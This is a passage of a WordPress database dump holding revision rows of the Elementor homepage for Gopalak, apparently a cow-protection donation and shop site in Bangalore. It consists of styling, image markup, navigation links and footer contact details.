.elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 10:35:14','2022-10-28 05:05:14','',1373,'https://gopalak.in/?p=1994',0,'revision','',0),(1995,1,'2022-10-28 10:35:15','2022-10-28 05:05:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 10:35:15','2022-10-28 05:05:15','',1373,'https://gopalak.in/?p=1995',0,'revision','',0),(1996,1,'2022-10-28 10:36:00','2022-10-28 05:06:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, 